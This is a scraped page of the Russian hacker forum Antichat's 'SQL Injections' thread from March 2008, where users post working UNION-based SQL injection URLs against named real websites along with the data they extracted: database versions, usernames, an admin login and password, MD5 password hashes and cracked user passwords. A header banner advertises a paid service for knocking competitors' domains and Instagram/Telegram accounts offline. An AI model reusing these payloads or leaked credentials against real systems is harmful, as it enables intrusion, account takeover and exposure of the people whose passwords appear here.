Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 513 из 1242

513

Опции темы

Поиск в этой теме

Опции просмотра

#5121

17.03.2008, 12:21

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Dima-k17
всё бы хорошо ,но это баян
_http://forum.antichat.ru/showpost.php?p=287675&postcount=501

#5122

17.03.2008, 12:49

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

Провел на форуме:
254802

Репутация: 52

Отправить сообщение для Dima-k17 с помощью ICQ

Цитата:

Сообщение от jokester

Dima-k17
всё бы хорошо ,но это баян
_http://forum.antichat.ru/showpost.php?p=287675&postcount=501

Сорри, смотрел тут, не нашел, посему и запостил:
http://filefront.jino-net.ru/sql.html
Однако у него без file_priv'a :-)
исправляюсь:

Код:

http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,table_name,22+from+information_schema.tables+limit+0,1/*

#5123

17.03.2008, 13:36

ZAMUT

Members of Antichat - Level 5

Регистрация: 24.10.2007

Сообщений: 256

Провел на форуме:
6905523

Репутация: 1174

Горе-кодеры

Код:

http://valera.asf.ru/perl/cookbook/cont.php?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)/*

#5124

18.03.2008, 03:44

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Парочка хостеров:

Ни у кого там сайтов нет ?

Этот смешной, там чудо защита какая-то,по ходу на скобки пишет: "I don't like you...", можно подумать я в восторге

_http://fairhost.ru/article.php?sid=-13+union+select+1,2,3,4,5,6,7,8,@@version,0,11/*

4.0.27-max-log

-------------------------------------
_http://www.alestar.biz/index.php?id1=5+and+1=2+union+select+1,2,concat(us er(),char(58),version(),char(58),database()),4,5,6/*

alesta_ya@localhost:4.1.22:alesta_db1

вывод в исходник
--------------------------------------
Таблицы не подобрал

#5125

18.03.2008, 04:05

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Отправить сообщение для Muhacir с помощью ICQ

http://library.informdon.ru/

Код:

http://library.informdon.ru/?p=4&sp=32&tp=2345432+union+select+0,pass,2,3,4,5,6,name+from+admin

administrator:2001

Код:

http://informdon.ru/library/admin/

OS :Windows NT A10 5.2 build 3790

там загрузка файла тоже есть имхо

#5126

18.03.2008, 16:14

Klaus Doring

Участник форума

Регистрация: 23.07.2007

Сообщений: 100

Провел на форуме:
620976

Репутация: 52

Отправить сообщение для Klaus Doring с помощью ICQ

Код:

 http://www.rogerssprayers.com/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*

Цитата:

admin:3ff9f71df33fff2b789abc66f564a708

#5127

18.03.2008, 16:58

kolka

Новичок

Регистрация: 19.02.2008

Сообщений: 4

Провел на форуме:
23616

Репутация: 6

Отправить сообщение для kolka с помощью ICQ

Отправить сообщение для kolka с помощью Yahoo

Белорусский сайт любителей хоккея.

http://www.belarushockey.com/?commid=-2141'+union+select+1,2,3,concat_ws(char(35),versio n(),database(),user())/*

4.0.24_Debian-10sarge1-log#belarushockeycom#belarushockeycom@localhost

http://www.belarushockey.com/?commid=-2141'+union+select+1,nick,mail,message+from+commen t/*

http://www.belarushockey.com/?commid=-2141'+union+select+1,author,title,text+from+news+w here+id=2142/*

#5128

18.03.2008, 23:09

~~ThreeD~~

Banned

Регистрация: 25.12.2006

Сообщений: 179

Провел на форуме:
2337678

Репутация: 354

http://www.apevia.com/category.php?cid=-14+union+select+1,concat_ws(0x3A3a,user(),database (),version()),3/*
Есть таблица users.
Поля не подобрал.

aspire@localhost::aspire::4.1.22-log

#5129

18.03.2008, 23:11

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

Провел на форуме:
1484154

Репутация: 126

Отправить сообщение для heks с помощью ICQ

когдато тоже ломал сайт этот

#5130

19.03.2008, 00:59

~~ThreeD~~

Banned

Регистрация: 25.12.2006

Сообщений: 179

Провел на форуме:
2337678

Репутация: 354

www.women-law.org

wapwebsite@localhost::4.1.22-standard::wapweb

http://www.women-law.org/program_service.php?pid=-14+union+select+1,2,concat_ws(0x3A3a,username,pass word),4,5+from+users/*

melitokagan::ed0c2fc45dd1662774ac8e8a86b9167d: m3k605
project::5f212e25801eb5a9fd02a0ee62e2fbb9: tap1982

Страница 513 из 1242

513

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход